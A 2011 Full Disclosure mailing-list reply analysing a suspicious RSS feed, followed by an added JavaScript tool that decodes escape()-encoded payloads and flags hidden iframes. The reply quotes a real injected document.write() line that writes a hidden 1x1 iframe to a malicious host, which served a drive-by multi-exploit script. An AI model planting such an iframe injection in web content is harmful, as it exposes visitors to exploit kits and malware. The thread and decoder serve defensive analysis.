Full Disclosure
mailing list archives
Re: PenTestIT.com RSS feed suspicious
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 06 Jul 2011 15:55:03 +1200
Andrew Farmer to ector dulac:

> > Looks suspicious to me
>
> Very. That unescapes to:
>
> document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72" width="1" height="1"
> frameborder="0"></iframe>')
>
> Which loads some amusingly obfuscated JS ...

Really?
That amused you?
Maybe my irony detector is on the blink, but that was very ordinary
several years ago.
> ... which looks like it's
> *supposed* to be a plugin exploit of some sort, but which has no
> real payload. At least, not when I looked.

Ummmm -- not what I got at all.
I got a very old, very common multi-exploit script that, if successful,
(that is, if run on a sufficiently old, sufficiently unpatched, system)
would have downloaded and executed a PE that was only just very
recently (a bit less than three hours ago) submitted to VirusTotal,
with these results:
http://www.virustotal.com/file-scan/report.html?id=9a68644038cb4f6a0b3b2057c5cdf5a22898675ebc20baedc601dfc94d9fa3e1-1309914305
Of course, what you get served from any given "exploit script" URL can
vary greatly, from hour-to-hour, GeoIP-to-GeoIP, and equally amongst
apparent browser User-Agents (including OS (OS X vs. Windows vs.
others) and even OS version (XP vs. Vista/Win7), etc), HTTP referer
headers, presence or absence or contents of cookies, and so on and so
forth...
Regards,
Nick FitzGerald
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
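As an added example, not part of Nick's message or of anything else on the original page, the following JavaScript statically decodes an escape()-encoded document.write() blob of the kind Andrew quoted and flags hidden-iframe injections without ever executing the script. The sample payload, its host example.invalid and its tp token are constructed placeholders rather than the thread's URL, and every function name here is the example's own.

```javascript
// Added example (not from the original post): decode an escape()-style
// document.write() payload and flag hidden iframes without running it.
// The SAMPLE below is CONSTRUCTED; host and token are placeholders.

// Decode %XX and %uXXXX sequences the way legacy JavaScript unescape() does,
// repeating until the text stops changing: injected blobs are often
// escaped more than once so that a single decode pass still looks opaque.
function unescapeLayers(s, maxLayers = 5) {
  let cur = s;
  for (let i = 0; i < maxLayers; i++) {
    const next = cur.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
      (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
    if (next === cur) return { text: cur, layers: i };
    cur = next;
  }
  return { text: cur, layers: maxLayers };
}

// Pull the string literal(s) passed to document.write(...) out of decoded JS.
function extractDocumentWrites(js) {
  const out = [];
  const re = /document\.write\s*\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  let m;
  while ((m = re.exec(js)) !== null) out.push(m[2]);
  return out;
}

// Parse every <iframe ...> tag in an HTML fragment into an attribute map.
function parseIframes(html) {
  const frames = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(t[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    frames.push(attrs);
  }
  return frames;
}

// Heuristic: a frame the user cannot see (1x1 or smaller, display:none,
// visibility:hidden) is the classic drive-by loader shape.
function isHiddenIframe(attrs) {
  const w = parseInt(attrs.width ?? '100', 10);
  const h = parseInt(attrs.height ?? '100', 10);
  const style = (attrs.style || '').toLowerCase();
  return (w <= 1 && h <= 1)
    || /display\s*:\s*none/.test(style)
    || /visibility\s*:\s*hidden/.test(style);
}

// Full pipeline: decode all escape layers, find document.write() calls,
// and return the src of every hidden iframe they would inject.
function analyse(escapedPayload) {
  const { text, layers } = unescapeLayers(escapedPayload);
  const hidden = [];
  for (const html of extractDocumentWrites(text)) {
    for (const f of parseIframes(html)) {
      if (isHiddenIframe(f)) hidden.push(f.src);
    }
  }
  return { layers, decoded: text, hiddenIframeSrcs: hidden };
}

// CONSTRUCTED sample: a document.write() of a 1x1 iframe, escape()-encoded
// and then escaped a second time (every '%' became '%25'), as an injected
// feed item might carry it. Host and tp token are placeholders.
const SAMPLE = 'document.write%2528%2527%253Ciframe%2520src%253D%2522http%253A//example.invalid/x.php%253Ftp%253D0123456789abcdef%2522%2520width%253D%25221%2522%2520height%253D%25221%2522%2520frameborder%253D%25220%2522%253E%253C/iframe%253E%2527%2529';

const report = analyse(SAMPLE);
console.log(`decoded through ${report.layers} escape layer(s)`);
console.log(report.decoded);
console.log('hidden iframe targets:', report.hiddenIframeSrcs);
```

The decoder only peels escape() layers; a blob that nests eval() or unescape() calls inside the written string needs the same treatment applied to the inner argument, and never by running it. Static decoding also only shows what the feed delivered: as Nick points out, what the iframe's host then serves varies by User-Agent, GeoIP, referer and cookies, so the next step is to fetch that URL from a disposable environment with several header profiles and compare the responses rather than trusting one look.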